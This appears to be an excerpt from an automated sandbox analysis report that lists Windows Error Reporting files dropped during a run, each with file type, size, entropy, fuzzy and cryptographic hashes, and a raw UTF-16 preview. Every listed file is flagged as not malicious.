                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6035.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6939657365767835
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWFhLCRYZYJW7DHTYEZBF0tCi/EKCbwL6hoGVbabM7M8S+IAA/:2ZDa+no6h9abM7M8SJAA/
                                                                                                                                                                                                                                        MD5:5B0ED517F27DD6A9401C8E5D21E85BBE
                                                                                                                                                                                                                                        SHA1:9EC612333112EB4AA107B0C76A54A7222FE5D0CC
                                                                                                                                                                                                                                        SHA-256:0B6B558FCA2AC0F526294EE6277FAF2DE2E9AC15DB35FAB81B7EA99C3631751D
                                                                                                                                                                                                                                        SHA-512:CC88C150DFDF2395FDA859C31AF95E964117D5364C43B126BF181F4C8A6366F1A21BE84EDB6118ACA6089F7C65F24F49FE068E3B2FE29A76D99617CF63BD7C63
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8884.tmp.dmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 19:34:32 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):257624
                                                                                                                                                                                                                                        Entropy (8bit):1.4935901636973956
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6XEyLtPFaW5v8A2oRlkVh15bbwvuMklr/3DtXC+ZTXKZ9njYC410zjemij18RmXa:/MmW5v8A2Slw84eCM5dDSYVXO
                                                                                                                                                                                                                                        MD5:E6A8C8E2BD3457BCC026E2B75E3B22A0
                                                                                                                                                                                                                                        SHA1:87634BE795D863563724E9B417532B86936A13DF
                                                                                                                                                                                                                                        SHA-256:468495115337957B34C55E47787DF26C9784801E67832543434F51CBA60C971B
                                                                                                                                                                                                                                        SHA-512:FF0FCDD85DF47441D9E8D458AF6215B8A6CFD56538FBCD8FC39EE168F8CD15ABCB9999ED96792A180CA181281A5DDEBD77BD48D92C23F964CE2E9F44295FBE2D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MDMP..a..... .......H.(f............4...........p...H.......l....(......................`.......8...........T............Q..h...........$)...........+..............................................................................eJ.......+......GenuineIntel............T...........1.(f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BF0.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8392
                                                                                                                                                                                                                                        Entropy (8bit):3.704005997677235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ3e6DgT6YoS6KZZgmf2YJjnHprV89bk3sf3Mm:R6lXJO6DgT6YF6K3gmf2YJj4k8fJ
                                                                                                                                                                                                                                        MD5:A757ED709C095F4B92D0E46459E5906E
                                                                                                                                                                                                                                        SHA1:16256B8D6F895FDB83EC0AB443CB84414ADCBC09
                                                                                                                                                                                                                                        SHA-256:0877C79009127D50085E5D4A86802511E0B251464DDE129C59A44B0ADA8D898F
                                                                                                                                                                                                                                        SHA-512:CDF6B57A0BE282132636D59E61E3EC41F71597C1312F770640E106AAF879276A496729049DBAE12C2CD06FC0C9A2953B9F0F8D0429401C7E8A9A7DF4758DCAE6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.5.6.<./.P.i.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C30.tmp.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4728
                                                                                                                                                                                                                                        Entropy (8bit):4.520482705685558
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsqJg77aI9f0WpW8VYCYm8M4JR70Fg+q8dNuwM5AZwhkfd:uIjf4I7Rt7VeJL/5swhCd
                                                                                                                                                                                                                                        MD5:9F209BD8652632468F5AF15F25E80046
                                                                                                                                                                                                                                        SHA1:714394174212E8675F87E836727D21DF9B32EEAC
                                                                                                                                                                                                                                        SHA-256:EEBEB0E009598712330F2D85EEBBB76D10BE9AA420F1BBD3C10698859DCD3CAA
                                                                                                                                                                                                                                        SHA-512:8DAB86E458D66FDBEFC2062E53E9A6DD9E15D2946F9D5D13B2E829DE813CE37E0DEE6A113127CF1799E0BE8B1A5790908BEC894D89E0BEFE8A5AEB29C80C1BFA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C4D.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87784
                                                                                                                                                                                                                                        Entropy (8bit):3.0377325742320194
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:AT94/255DRSGPrDdJNqQT4mxslVbn+b+d+ZYd+O9jz3sE+:AT94/255DRSGPrDdJNqQT4mxslVbn+bL
                                                                                                                                                                                                                                        MD5:C83FB41C1549FD269FEE0D39F4390AE7
                                                                                                                                                                                                                                        SHA1:5C2F4AE788F858D8FEF7F1A77B613C2F8566C79F
                                                                                                                                                                                                                                        SHA-256:41B1BBD490B02FA483F114F96F738F335C12EF2F6A3D8771F0C6498BB7A0BA05
                                                                                                                                                                                                                                        SHA-512:E3A6197B72597D52D1DF43994C214558B6D3E45A42A87FB44CBDF65E87C78560FFA2C2E84BF673080A8E0D419D862F262836AA1464DF0D83469D3DDF953884D0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D48.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6852060819730696
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWVcWxpHtmfY1YHHWUhHaYEZWftFiP3TCdwEjkv6a5beMX0aIuX3:2ZDVcVfyQNXT7a5beMX0NuX3
                                                                                                                                                                                                                                        MD5:FA0C800287C6B9A8881EF017E4D59D64
                                                                                                                                                                                                                                        SHA1:9574460E777C18A5123A37484833857D474CA0FD
                                                                                                                                                                                                                                        SHA-256:A4A19B5C5A94147A9767B9AF653235F0731BF1A3FCE2CB64D0D949CA3509FD9C
                                                                                                                                                                                                                                        SHA-512:D22F47487E9759195BFC576C05832C9FBB931DDCD12856A0A9F5AA0DBA5F7B723469A8C6661E79ED7A8EDFB44B0067076D3D67FF12857DBE95BE4BC3F459845C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER99D4.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101386
                                                                                                                                                                                                                                        Entropy (8bit):3.037440456104789
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:mHfeTtH0FJpZ1yStaLgwk+z+Y+y+nXvu+4+soH+E+D+q+O+E+2+f+H+T+jWd+sXx:c
                                                                                                                                                                                                                                        MD5:268B7451D22CDBA0AD7547BBEA6A076D
                                                                                                                                                                                                                                        SHA1:42556CEBF4234F440E468AB68E1C92C69ED34876
                                                                                                                                                                                                                                        SHA-256:B4680915629C1E40F48AA7BA0ABD21C022378EF8930DCA13AFDA07290D274F4E
                                                                                                                                                                                                                                        SHA-512:28B160B579A5B958F10CC6A1A3FD5CED14A77DE02563B3D1B1E9A7D037896257777B0E3B303FF9E6E1BE9D50AE6169D39419FE81399CA28950194DCF3CA5D484
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C94.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6981443441914474
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYW3TLJ9grd6YkYvWBCfHpYEZXmtCijEvCZwEdNCaUM0MiSeI/AM:2ZD3CYTCDMPCaUM0MiSp/AM
                                                                                                                                                                                                                                        MD5:DCD77C520E33E889CD5041578231D7E5
                                                                                                                                                                                                                                        SHA1:FA5D7B218F6E93DC3560825EB4E047EE99925DB2
                                                                                                                                                                                                                                        SHA-256:7C2CD3C43CEB44FD0D6936D1F18852C924D0B151BB48910D4420D70E9F77E466
                                                                                                                                                                                                                                        SHA-512:A809FCA9D3322F08FFEBDBB5DADA20DA81F333B8C2DA01A662D579D68AE478C41802288B73E31ED4B0747315F018D203700499B58474AD7BC7C231D28E02A825
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1BA.tmp.dmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 19:34:39 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):261476
                                                                                                                                                                                                                                        Entropy (8bit):1.4880005068748894
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:C3+jdeNvK5vw76pyIkYcuDP2GFcTroMrtnwl1tu+mKJIgfzrpl2Em1t:i0CK5vwyyIekGrD9+XGOOEm1t
                                                                                                                                                                                                                                        MD5:85BF0BABC88BD541574FE356A08DDC26
                                                                                                                                                                                                                                        SHA1:255104E2E3D5B521600FEA5556C6005BAF41A747
                                                                                                                                                                                                                                        SHA-256:E11BAA125E3A2198F22CDD1F80892508E02B4BC5222DAB9BA5292413CCDC7949
                                                                                                                                                                                                                                        SHA-512:D6701C1D7FF97B5C5B442636B3EC9CC5236D142A4513E47396EE106CD8F8C95748B1ACB70A8C1351272E0D72FBB4B9FF455BCE6E3E8F6CF6AAA7B41DE7AFDBC8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MDMP..a..... .......O.(f............d...............x.......l...|(.......... ...........`.......8...........T............O..|............(...........*..............................................................................eJ......l+......GenuineIntel............T...........9.(f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA265.tmp.dmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 19:34:40 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2532994
                                                                                                                                                                                                                                        Entropy (8bit):1.974773785472376
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:+4byVZSIYxtykkIN+j4+5pdTjww2lzwQ2MKMarkajq:+oAbqw6j2MKY2
                                                                                                                                                                                                                                        MD5:01BB9B37B8DBE89B336BFB0454E154C4
                                                                                                                                                                                                                                        SHA1:24ACC01833F929B9451A3D366B4F3B2191C314E2
                                                                                                                                                                                                                                        SHA-256:BEC3162DC4C78CC963236E88D0D7536CC7C83EC4E00FA3F6E86427C35CF2C09C
                                                                                                                                                                                                                                        SHA-512:91F3407A040DCE05725287F0B24C51E1FF774359E24F107CE744E0FE586F84E0BAB63268738DBEE868EA7802F713DD244F0D5E202416D7729A4EFCE8926F128A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MDMP..a..... .......P.(f............d...........p...x.......l....(......................`.......8...........T...........p...............T)..........@+..............................................................................eJ.......+......GenuineIntel............T.......,...9.(f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA42C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6370
                                                                                                                                                                                                                                        Entropy (8bit):3.7267685387784604
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ6u96JzRYilfFJjmqHpr089bO6sfOam:R6lXJJ6JzRY4fFJjm4OZfK
                                                                                                                                                                                                                                        MD5:3865225B6B879B75D22854F748F27AE7
                                                                                                                                                                                                                                        SHA1:59618BCAEFD6DAE5C5038797A7599ADAD3175BAD
                                                                                                                                                                                                                                        SHA-256:CC2D499EE74225C9EF2FB069C100B28360C1C56F1113AADB4FD22C45FB74008B
                                                                                                                                                                                                                                        SHA-512:742B2255F0C01C6E41F136228787EAC48AC1439EEBCC7C190ABD14467E7D9E25B66390F6120E54A5418389474884BF25414BE83F6B2567BF3BFC97E99C7F81B1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
